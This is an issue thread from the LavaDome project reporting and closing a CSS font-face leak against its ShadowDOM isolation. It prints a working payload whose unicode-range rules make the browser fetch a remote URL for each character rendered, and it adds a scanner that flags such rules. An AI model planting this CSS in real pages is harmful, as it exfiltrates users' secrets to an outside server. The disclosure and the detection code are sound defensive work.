LavaMoat / LavaDome

Secure DOM trees isolation and encapsulation leveraging ShadowDOM
https://lavamoat.github.io/LavaDome/packages/core/demo/
MIT License

LavaDome is vulnerable to font-face-based leak attack #16

Closed weizman closed 6 months ago

weizman commented 6 months ago

Based on @masatokinugawa's research (introduced to me by @mhofman), the following attack can exfiltrate relevant chars of the secret (with order most of the time) to a remote server when added to the demo app:

<style>
    @font-face{
        font-family:attack;
        src:url('//l0.cm/?Found:A');
        unicode-range:U+0041;
    }
    @font-face{
        font-family:attack;
        src:url('//l0.cm/?Found:B');
        unicode-range:U+0042;
    }
    @font-face{
        font-family:attack;
        src:url('//l0.cm/?Found:C');
        unicode-range:U+0043;
    }
    #PRIVATE{
        font-family:attack;
    }
</style>
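As an added example that is not part of this issue or of LavaDome's code: a small scanner (function and constant names are assumed) that flags @font-face rules pairing a remote src with a unicode-range, which is the shape of the per-character leak shown above. The sample stylesheet is constructed for the demo.

```javascript
// Added example, not LavaDome code. Flags @font-face rules whose src is a
// remote URL and which also carry a unicode-range: such a rule makes the
// browser fetch a distinct URL only when a character in that range is
// rendered, so a stylesheet full of them acts as a per-character beacon.
const FONT_FACE_RE = /@font-face\s*\{([^}]*)\}/gi;

// Split a rule body into { property: value } (lower-cased property names).
function parseDeclarations(body) {
  const decls = {};
  for (const part of body.split(';')) {
    const idx = part.indexOf(':');
    if (idx === -1) continue;
    const name = part.slice(0, idx).trim().toLowerCase();
    const value = part.slice(idx + 1).trim();
    if (name) decls[name] = value;
  }
  return decls;
}

// True when the first url() in a src value points at another origin:
// url('//host/..'), url(http://..) or url("https://.."). local() and
// same-origin paths such as url('/fonts/x.woff2') are not remote.
function isRemoteSrc(src) {
  const m = /url\(\s*['"]?([^'")]+)['"]?\s*\)/i.exec(src || '');
  if (!m) return false;
  return /^(https?:)?\/\//i.test(m[1].trim());
}

// Returns one finding per suspicious @font-face rule in the stylesheet text.
function findFontFaceLeaks(cssText) {
  const findings = [];
  for (const match of cssText.matchAll(FONT_FACE_RE)) {
    const decls = parseDeclarations(match[1]);
    if (decls['unicode-range'] && isRemoteSrc(decls['src'])) {
      findings.push({
        fontFamily: decls['font-family'] || '(none)',
        unicodeRange: decls['unicode-range'],
        src: decls['src'],
      });
    }
  }
  return findings;
}

// Constructed sample: two rules in the shape reported above, plus a benign
// self-hosted subset font that also uses unicode-range and must not be flagged.
const SAMPLE_CSS = `
@font-face{font-family:attack;src:url('//l0.cm/?Found:A');unicode-range:U+0041;}
@font-face{font-family:attack;src:url("https://l0.cm/?Found:B");unicode-range:U+0042;}
@font-face{font-family:body;src:url('/fonts/latin.woff2');unicode-range:U+0000-00FF;}
#PRIVATE{font-family:attack;}
`;
```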
weizman commented 6 months ago

fixed #17